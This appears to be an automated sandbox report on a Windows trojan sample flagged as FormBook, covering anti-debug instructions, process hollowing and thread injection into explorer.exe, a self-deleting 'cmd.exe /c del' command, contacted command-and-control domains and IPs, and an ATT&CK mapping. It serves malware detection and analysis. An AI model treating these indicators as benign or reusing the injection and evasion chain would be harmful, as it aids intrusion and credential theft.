Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A04D3B mov eax, dword ptr fs:[00000030h]	5_2_04A04D3B
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A04D3B mov eax, dword ptr fs:[00000030h]	5_2_04A04D3B
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A04D3B mov eax, dword ptr fs:[00000030h]	5_2_04A04D3B
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049D9100 mov eax, dword ptr fs:[00000030h]	5_2_049D9100
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049D9100 mov eax, dword ptr fs:[00000030h]	5_2_049D9100
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049D9100 mov eax, dword ptr fs:[00000030h]	5_2_049D9100
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04AA8D34 mov eax, dword ptr fs:[00000030h]	5_2_04AA8D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049E3D34 mov eax, dword ptr fs:[00000030h]	5_2_049E3D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049E3D34 mov eax, dword ptr fs:[00000030h]	5_2_049E3D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049E3D34 mov eax, dword ptr fs:[00000030h]	5_2_049E3D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049E3D34 mov eax, dword ptr fs:[00000030h]	5_2_049E3D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049E3D34 mov eax, dword ptr fs:[00000030h]	5_2_049E3D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049E3D34 mov eax, dword ptr fs:[00000030h]	5_2_049E3D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049E3D34 mov eax, dword ptr fs:[00000030h]	5_2_049E3D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049E3D34 mov eax, dword ptr fs:[00000030h]	5_2_049E3D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049E3D34 mov eax, dword ptr fs:[00000030h]	5_2_049E3D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049E3D34 mov eax, dword ptr fs:[00000030h]	5_2_049E3D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049E3D34 mov eax, dword ptr fs:[00000030h]	5_2_049E3D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049E3D34 mov eax, dword ptr fs:[00000030h]	5_2_049E3D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049E3D34 mov eax, dword ptr fs:[00000030h]	5_2_049E3D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049DAD30 mov eax, dword ptr fs:[00000030h]	5_2_049DAD30
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049F4120 mov eax, dword ptr fs:[00000030h]	5_2_049F4120
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049F4120 mov eax, dword ptr fs:[00000030h]	5_2_049F4120
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049F4120 mov eax, dword ptr fs:[00000030h]	5_2_049F4120
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049F4120 mov eax, dword ptr fs:[00000030h]	5_2_049F4120
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049F4120 mov ecx, dword ptr fs:[00000030h]	5_2_049F4120
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049F7D50 mov eax, dword ptr fs:[00000030h]	5_2_049F7D50
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049FB944 mov eax, dword ptr fs:[00000030h]	5_2_049FB944
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049FB944 mov eax, dword ptr fs:[00000030h]	5_2_049FB944
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A13D43 mov eax, dword ptr fs:[00000030h]	5_2_04A13D43
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A53540 mov eax, dword ptr fs:[00000030h]	5_2_04A53540
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049FC577 mov eax, dword ptr fs:[00000030h]	5_2_049FC577
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049FC577 mov eax, dword ptr fs:[00000030h]	5_2_049FC577
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049DB171 mov eax, dword ptr fs:[00000030h]	5_2_049DB171
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049DB171 mov eax, dword ptr fs:[00000030h]	5_2_049DB171
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049DC962 mov eax, dword ptr fs:[00000030h]	5_2_049DC962
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A546A7 mov eax, dword ptr fs:[00000030h]	5_2_04A546A7
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04AA0EA5 mov eax, dword ptr fs:[00000030h]	5_2_04AA0EA5
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04AA0EA5 mov eax, dword ptr fs:[00000030h]	5_2_04AA0EA5
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04AA0EA5 mov eax, dword ptr fs:[00000030h]	5_2_04AA0EA5
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A0FAB0 mov eax, dword ptr fs:[00000030h]	5_2_04A0FAB0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A6FE87 mov eax, dword ptr fs:[00000030h]	5_2_04A6FE87
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049EAAB0 mov eax, dword ptr fs:[00000030h]	5_2_049EAAB0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049EAAB0 mov eax, dword ptr fs:[00000030h]	5_2_049EAAB0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A0D294 mov eax, dword ptr fs:[00000030h]	5_2_04A0D294
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A0D294 mov eax, dword ptr fs:[00000030h]	5_2_04A0D294
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049D52A5 mov eax, dword ptr fs:[00000030h]	5_2_049D52A5
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049D52A5 mov eax, dword ptr fs:[00000030h]	5_2_049D52A5
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049D52A5 mov eax, dword ptr fs:[00000030h]	5_2_049D52A5
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049D52A5 mov eax, dword ptr fs:[00000030h]	5_2_049D52A5
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049D52A5 mov eax, dword ptr fs:[00000030h]	5_2_049D52A5
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A016E0 mov ecx, dword ptr fs:[00000030h]	5_2_04A016E0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A02AE4 mov eax, dword ptr fs:[00000030h]	5_2_04A02AE4
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A18EC7 mov eax, dword ptr fs:[00000030h]	5_2_04A18EC7
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A8FEC0 mov eax, dword ptr fs:[00000030h]	5_2_04A8FEC0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A02ACB mov eax, dword ptr fs:[00000030h]	5_2_04A02ACB
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A036CC mov eax, dword ptr fs:[00000030h]	5_2_04A036CC
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04AA8ED6 mov eax, dword ptr fs:[00000030h]	5_2_04AA8ED6
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049E76E2 mov eax, dword ptr fs:[00000030h]	5_2_049E76E2
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049F3A1C mov eax, dword ptr fs:[00000030h]	5_2_049F3A1C
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049DAA16 mov eax, dword ptr fs:[00000030h]	5_2_049DAA16
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049DAA16 mov eax, dword ptr fs:[00000030h]	5_2_049DAA16
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049E8A0A mov eax, dword ptr fs:[00000030h]	5_2_049E8A0A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A8FE3F mov eax, dword ptr fs:[00000030h]	5_2_04A8FE3F
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049DC600 mov eax, dword ptr fs:[00000030h]	5_2_049DC600
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049DC600 mov eax, dword ptr fs:[00000030h]	5_2_049DC600
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049DC600 mov eax, dword ptr fs:[00000030h]	5_2_049DC600
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A08E00 mov eax, dword ptr fs:[00000030h]	5_2_04A08E00
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A0A61C mov eax, dword ptr fs:[00000030h]	5_2_04A0A61C
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A0A61C mov eax, dword ptr fs:[00000030h]	5_2_04A0A61C
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049DE620 mov eax, dword ptr fs:[00000030h]	5_2_049DE620
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A8B260 mov eax, dword ptr fs:[00000030h]	5_2_04A8B260
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A8B260 mov eax, dword ptr fs:[00000030h]	5_2_04A8B260
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04AA8A62 mov eax, dword ptr fs:[00000030h]	5_2_04AA8A62
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A1927A mov eax, dword ptr fs:[00000030h]	5_2_04A1927A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049D9240 mov eax, dword ptr fs:[00000030h]	5_2_049D9240
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049D9240 mov eax, dword ptr fs:[00000030h]	5_2_049D9240
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049D9240 mov eax, dword ptr fs:[00000030h]	5_2_049D9240
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049D9240 mov eax, dword ptr fs:[00000030h]	5_2_049D9240
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049E7E41 mov eax, dword ptr fs:[00000030h]	5_2_049E7E41
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049E7E41 mov eax, dword ptr fs:[00000030h]	5_2_049E7E41
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049E7E41 mov eax, dword ptr fs:[00000030h]	5_2_049E7E41
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049E7E41 mov eax, dword ptr fs:[00000030h]	5_2_049E7E41
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049E7E41 mov eax, dword ptr fs:[00000030h]	5_2_049E7E41
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049E7E41 mov eax, dword ptr fs:[00000030h]	5_2_049E7E41
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049FAE73 mov eax, dword ptr fs:[00000030h]	5_2_049FAE73
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049FAE73 mov eax, dword ptr fs:[00000030h]	5_2_049FAE73
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049FAE73 mov eax, dword ptr fs:[00000030h]	5_2_049FAE73
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049FAE73 mov eax, dword ptr fs:[00000030h]	5_2_049FAE73
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049FAE73 mov eax, dword ptr fs:[00000030h]	5_2_049FAE73
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A64257 mov eax, dword ptr fs:[00000030h]	5_2_04A64257
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049E766D mov eax, dword ptr fs:[00000030h]	5_2_049E766D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049E8794 mov eax, dword ptr fs:[00000030h]	5_2_049E8794
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04AA5BA5 mov eax, dword ptr fs:[00000030h]	5_2_04AA5BA5
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049E1B8F mov eax, dword ptr fs:[00000030h]	5_2_049E1B8F
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049E1B8F mov eax, dword ptr fs:[00000030h]	5_2_049E1B8F
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A9138A mov eax, dword ptr fs:[00000030h]	5_2_04A9138A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A8D380 mov ecx, dword ptr fs:[00000030h]	5_2_04A8D380
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A0B390 mov eax, dword ptr fs:[00000030h]	5_2_04A0B390
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A57794 mov eax, dword ptr fs:[00000030h]	5_2_04A57794
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A57794 mov eax, dword ptr fs:[00000030h]	5_2_04A57794
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A57794 mov eax, dword ptr fs:[00000030h]	5_2_04A57794
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A02397 mov eax, dword ptr fs:[00000030h]	5_2_04A02397
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A003E2 mov eax, dword ptr fs:[00000030h]	5_2_04A003E2
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A003E2 mov eax, dword ptr fs:[00000030h]	5_2_04A003E2
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A003E2 mov eax, dword ptr fs:[00000030h]	5_2_04A003E2
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A003E2 mov eax, dword ptr fs:[00000030h]	5_2_04A003E2
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A003E2 mov eax, dword ptr fs:[00000030h]	5_2_04A003E2
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A003E2 mov eax, dword ptr fs:[00000030h]	5_2_04A003E2
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A137F5 mov eax, dword ptr fs:[00000030h]	5_2_04A137F5
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A553CA mov eax, dword ptr fs:[00000030h]	5_2_04A553CA
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A553CA mov eax, dword ptr fs:[00000030h]	5_2_04A553CA
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049FF716 mov eax, dword ptr fs:[00000030h]	5_2_049FF716
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A0E730 mov eax, dword ptr fs:[00000030h]	5_2_04A0E730
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04AA070D mov eax, dword ptr fs:[00000030h]	5_2_04AA070D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04AA070D mov eax, dword ptr fs:[00000030h]	5_2_04AA070D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A0A70E mov eax, dword ptr fs:[00000030h]	5_2_04A0A70E
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A0A70E mov eax, dword ptr fs:[00000030h]	5_2_04A0A70E
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A9131B mov eax, dword ptr fs:[00000030h]	5_2_04A9131B
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049D4F2E mov eax, dword ptr fs:[00000030h]	5_2_049D4F2E
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049D4F2E mov eax, dword ptr fs:[00000030h]	5_2_049D4F2E
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A6FF10 mov eax, dword ptr fs:[00000030h]	5_2_04A6FF10
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A6FF10 mov eax, dword ptr fs:[00000030h]	5_2_04A6FF10
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04AA8F6A mov eax, dword ptr fs:[00000030h]	5_2_04AA8F6A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049DF358 mov eax, dword ptr fs:[00000030h]	5_2_049DF358
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A03B7A mov eax, dword ptr fs:[00000030h]	5_2_04A03B7A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A03B7A mov eax, dword ptr fs:[00000030h]	5_2_04A03B7A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049DDB40 mov eax, dword ptr fs:[00000030h]	5_2_049DDB40
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049EEF40 mov eax, dword ptr fs:[00000030h]	5_2_049EEF40
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04AA8B58 mov eax, dword ptr fs:[00000030h]	5_2_04AA8B58
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049DDB60 mov ecx, dword ptr fs:[00000030h]	5_2_049DDB60
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049EFF60 mov eax, dword ptr fs:[00000030h]	5_2_049EFF60

Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Domain query: www.utformehagen.com
Source: C:\Windows\explorer.exe	Domain query: www.sdmdwang.com
Source: C:\Windows\explorer.exe	Network Connect: 104.168.135.142 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.sunilpsingh.com
Source: C:\Windows\explorer.exe	Domain query: www.tapdaugusta.com
Source: C:\Windows\explorer.exe	Network Connect: 184.168.131.241 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 45.39.95.186 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 74.206.228.78 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 107.165.13.75 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.regarta.com
Source: C:\Windows\explorer.exe	Domain query: www.advancedautorepairsonline.com
Source: C:\Windows\explorer.exe	Domain query: www.profitsnavigator.com
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 112.213.96.11 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.konversationswithkoshie.net
Source: C:\Windows\explorer.exe	Domain query: www.lovertons.com

Maps a DLL or memory area into another process

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread register set: target process: 3440			Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Thread register set: target process: 3440			Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Section unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: 900000

Jump to behavior

Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe			Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'			Jump to behavior

Source: explorer.exe, 00000002.00000000.346354887.0000000000EE0000.00000002.00000001.sdmp, cmmon32.exe, 00000005.00000002.605414493.0000000003270000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000000.345941626.00000000008B8000.00000004.00000020.sdmp, cmmon32.exe, 00000005.00000002.605414493.0000000003270000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000002.00000000.346354887.0000000000EE0000.00000002.00000001.sdmp, cmmon32.exe, 00000005.00000002.605414493.0000000003270000.00000002.00000001.sdmp	Binary or memory string: &Program Manager
Source: explorer.exe, 00000002.00000000.346354887.0000000000EE0000.00000002.00000001.sdmp, cmmon32.exe, 00000005.00000002.605414493.0000000003270000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe	Queries volume information: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.9JzK89dRiaBYTuN.exe.3754088.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.9JzK89dRiaBYTuN.exe.35b0360.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.598731483.00000000008D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.342547133.0000000003549000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.396448884.0000000001990000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.396143865.0000000001470000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.395997570.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.603676182.0000000002CC0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.598176527.0000000000770000.00000040.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.9JzK89dRiaBYTuN.exe.3754088.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.9JzK89dRiaBYTuN.exe.35b0360.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.598731483.00000000008D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.342547133.0000000003549000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.396448884.0000000001990000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.396143865.0000000001470000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.395997570.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.603676182.0000000002CC0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.598176527.0000000000770000.00000040.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Shared Modules1	Path Interception	Process Injection512	Masquerading1	Input Capture1	Security Software Discovery221	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Disable or Modify Tools1	LSASS Memory	Process Discovery2	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion31	Security Account Manager	Virtualization/Sandbox Evasion31	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection512	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol12	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Deobfuscate/Decode Files or Information1	LSA Secrets	System Information Discovery112	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information4	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Software Packing3	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
9JzK89dRiaBYTuN.exe	57%	Virustotal		Browse
9JzK89dRiaBYTuN.exe	75%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla
9JzK89dRiaBYTuN.exe	100%	Avira	HEUR/AGEN.1142734
9JzK89dRiaBYTuN.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
